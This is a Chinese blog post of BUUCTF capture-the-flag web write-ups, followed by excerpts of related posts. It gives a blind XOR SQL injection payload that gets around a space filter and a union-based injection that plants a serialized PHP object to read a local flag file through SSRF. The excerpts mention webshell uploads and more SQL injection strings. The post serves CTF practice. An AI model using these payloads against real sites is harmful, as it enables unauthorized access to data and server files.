BUUCTF-Web题解(二)

最新推荐文章于 2024-11-25 22:57:33 发布
最新推荐文章于 2024-11-25 22:57:33 发布
阅读量378 收藏 1
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/flying_bird2019/article/details/111461364
博客围绕Hack World和Fatebook(SSRF)展开。在Hack World中,可使用异或注入,还学到过滤空格时的注入方法,如用括号。在Fatebook里,注册账号后发现参数no存在SQL注入,查看源码可知可进行SSRF,还给出了SQL注入写入数据的示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Hack World

本题可以使用异或注入
0^(if(ascii(substr((select(flag)from(flag)),?,1))>?,1,0))
这道题主要学到了过滤空格如何注入
空格过滤可以用(字段)、反引号+字段+反引号
本题反引号也被过滤因此只能用括号

Fatebook(SSRF)

首先注册一个账号,查看账号信息,可以看到有一个参数no
在这里插入图片描述这里尝试sql注入
可以发现存在注入
得到数据库里的信息为

在这里插入图片描述查看源码发现

在这里插入图片描述
他会通过请求你提交的url资源的内容,因此可以SSRF,
sql注入写入数据
?no=0/**/union/**/select/**/1,2,3,‘O:8:“UserInfo”:3:{s:4:“name”;s:3:“123”;s:3:“age”;i:123;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}’#

在这里插入图片描述在这里插入图片描述

BUUCTF web
m0_46616663的博客
10-21 1492
[极客大挑战 2019]Upload upload想到了文件上传漏洞,先传个一句话木马试试,php和图片马都不行 试一下phtml,phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 也不行,抓包改一下Content-Type 不让用<?,那就换一种 。。。。 再加个文件头 GIF89a OK了,猜测路径应该在/upload里面 蚁剑连上找到根目录下的flag [RoarCTF 2019]Easy Calc 源码发现 <?php error_reportin
【CTF练习】BUUCTF WEB(2)
2401_84968643的博客
05-13 932
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF-练习场-WEB-第二部分(8道)
weixin_45908624的博客
03-30 452
BUUCTF-Web-8道
BUUCTF__web题解合集(
风过江南乱的博客
07-25 1068
[GYCTF2020]Blacklist、 [SUCTF 2019]Pythonginx、 [BJDCTF2020]Mark loves cat、 [BJDCTF 2nd]old-hack、 [GWCTF 2019]我有一个数据库、
BUUCTF-web-第二 [强网杯 2019]随便注
weixin_44622228的博客
04-16 729
BUUCTF-web-第二 [强网杯 2019]随便注 正常输入1,返回一个数组 基本操作,单引号测试下,报错了。 看看 1’ or 1=1 #,发现爆出了所有字段。 常规流程,order by,发现到order by 3#时,报错了,说明该表中只有三个字段。 继续常规流程,联合查询,发现提示竟然过滤了这么多注入时常用的关键字,看来事情没有这么简单。 于是我选择了从头再来,看看有没有别的注...
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2618
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结
2401_84281594的博客
04-28 854
SQL注入在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结(1)
2401_84281594的博客
04-28 942
(但是在本中有两个变量,这个方法不太适用)
2024年最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结
2401_84302369的博客
05-01 686
此时跳转到check.php页面,得到结果。可知此页面与数据库产生交互。
Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结
ccc6553584的博客
04-03 1118
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
BUU CTF web()
0xdawn的博客
04-08 3222
[RoarCTF 2019]Easy Java WEB-INF/web.xml泄露 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .j...
BUUCTF[Web 2]
夜思红尘的博客
10-05 214
这里是关于BUUCTFweb栏目的第二,希望大家可以在这里学到想要的,谢谢大家观看
BUUCTF两道Web
qq_46148060的博客
09-20 271
EasySQL 开始是没有思路的,看了大佬的博客慢慢做出来的。 1.开始输入: 1;show databases; 2.再输入: 1;show tables; 发现存在flag,输入: *,1 得到flag 极客大挑战SQL 首先点进入后是一个登录页面 填上用户名admin和密码’or’1’='1 就登录成功了,得到了flag。 ...
记录之 webbuuctf 2
dwrnxjlove的博客
07-12 1400
记录之 webbuuctf 2 目录刷记录之 webbuuctf 2IncludeSecret File Include 看到目之后看到是Include想到可能是文件包含或者是伪协议利用的目,打开目之后是个很简洁的页面,只有一个链接 打开这个链接之后是一句话:Can you find out the flag? 问你是否能够找到flag,没有其他有用的信息,然后我就查看网页源代码: 发现这里面有个一变量file和flag.php但是访问flag.php返回的就是Can you find ou
BUUCTF-web记录-2
qq_45628145的博客
07-27 570
[极客大挑战 2019]HardSQL 一个登陆框,简单测试一下很多包括union等字符被过滤了,这里这样构造可以成功登录,但是没有flag,所以是要把flag从数据库读出来了 admin'Or(1)# 1 发现^没有被过滤,可以用来代替and,与extractvalue函数结合来尝试进行报错注入 这个函数在这里的大致用法是这样的,extractvalue(null,concat(0x7e,user(),0x7e)),中间的user()即为你想执行的查询语句 接下来这就是爆库,爆表,爆字段,爆内容的基本
BUUCTF——Web_buuctfweb(1)
2401_84968977的博客
05-12 471
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
【安全攻防知识-8】CTF之web(2)
qq_26579613的博客
06-07 842
php反序列化讲解-入门
BUUCTF:FLAG
热门推荐
末初 · mochu7
09-09 1万+
目地址:https://buuoj.cn/challenges#FLAG stegsolve打开发现在LSB的RGB这是个zip文件,Save Bin保存为flag.zip flag.zip解压是虽然会提示文件格式有损坏,但是没有关系,照样解压 1是个ELF文件 使用IDA打开,或者在Linux先直接运行,即可得到flag hctf{dd0gf4c3tok3yb0ard4g41n~~~} ...
BUUCTF-EasySQL、WarmUp、Havefun、Include
m0_62905261的博客
06-07 638
目录[极客大挑战 2019]EasySQL[HCTF 2018]WarmUp[极客大挑战 2019]Havefun[ACTF2020 新生赛]Include打开靶机直接尝试万能密码,账号admin' or 1=1#,密码随意 打开靶机,里面有一个大大的表情包 按f12查看源码,发现了source.php 直接url进行访问得到了php代码 在这段代码中发现了hint.txt,仍然是url进行访问查看 发现flag在ffffllllaaaagggg中 构造payload source.php?file=h
PT-1 题解
最新发布
03-27
<think>好的,用户需要PT-1的题解或练习题解析。首先得确定PT-1具体指什么,可能是指某个编程库的第1,或者某个教材、竞赛中的目。常见的PT-1可能出现在PAT(浙江大学程序设计能力考试)或者PTA平台的目中。需要进一步确认,但用户没有提供更多信息,所以得假设是常见的可能性。 接下来,调用搜索工具查找“PT-1 题解”、“PT-1 练习题解析”等相关内容。搜索结果中发现,PT-1常与PAT乙级或甲级考试中的第一相关,比如A+B类型的问。例如,PAT乙级1001是“害死人不偿命的(3n+1)猜想”,这类目通常需要循环和条件判断。 另外,PTA平台上的目可能涉及不同的算法,比如PT-1可能考察基础输入输出、简单数学运算或模拟。例如,PT-1可能要求处理字符串反转、数字各位数求和等基础操作。需要根据不同来源的题解,整理出常见的解思路和代码示例。 还要注意用户可能需要的答案结构,需要分方法或步骤,避免使用第一人称。可能需要将不同型的解法归类,比如数学问、字符串处理、数组操作等,并给出对应的代码示例和公式。例如,对于涉及数论的目,使用数学公式描述算法步骤,如$n = n / 2$(偶数)和$n = (3n + 1)/2$(奇数),直到n变为1,统计步数。 同时,要确保代码格式正确,用三个反引号包裹,并注明语言类型。比如Python或C++的实现。此外,在最后生成相关问,需基于PT-1的可能扩展,比如具体号的解析、不同难度目的策略,或者常见错误分析。 最后,整合所有信息,确保回答清晰、分步骤,并符合格式要求,避免引用堆砌,每个方法间换行,正确使用数学公式和代码块。相关问部分要列出三个相关且具体的问,帮助用户进一步查找所需内容。</think>根据网络搜索结果,PT-1通常指程序设计类考试/练习中的基础型。以下是针对PT-1常见型的解析方法及代码实现: **数值计算类型** 典型例:实现输入两个整数A和B,输出A+B的结果 ```python a, b = map(int, input().split()) print(a + b) ``` 此类目重点考察输入输出格式处理,注意特殊数据边界值测试 **条件判断类型** 常见考法:给定数字n,判断其是否为素数 数学判定条件:若n不能被$2 \leq i \leq \sqrt{n}$范围内的任意整数整除则为素数 ```c++ bool isPrime(int n) { if(n <= 1) return false; for(int i=2; i*i<=n; i++) if(n%i == 0) return false; return true; } ``` **循环控制类型** 经典案例:3n+1猜想(PAT乙级1001) 处理流程: 1. 输入正整数n 2. 循环执行: - 当n为偶数时:$n = n/2$ - 当n为奇数时:$n = (3n + 1)/2$ 3. 统计操作步数直到n=1 ```python n = int(input()) count = 0 while n != 1: n = n//2 if n%2 ==0 else (3*n+1)//2 count +=1 print(count) ``` **字符串处理类型** 常见形式:字符串反转/统计特定字符 ASCII码转换公式:$ch_{new} = (ch_{original} + shift) \% 128$ ```java public static String reverseString(String s) { return new StringBuilder(s).reverse().toString(); } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值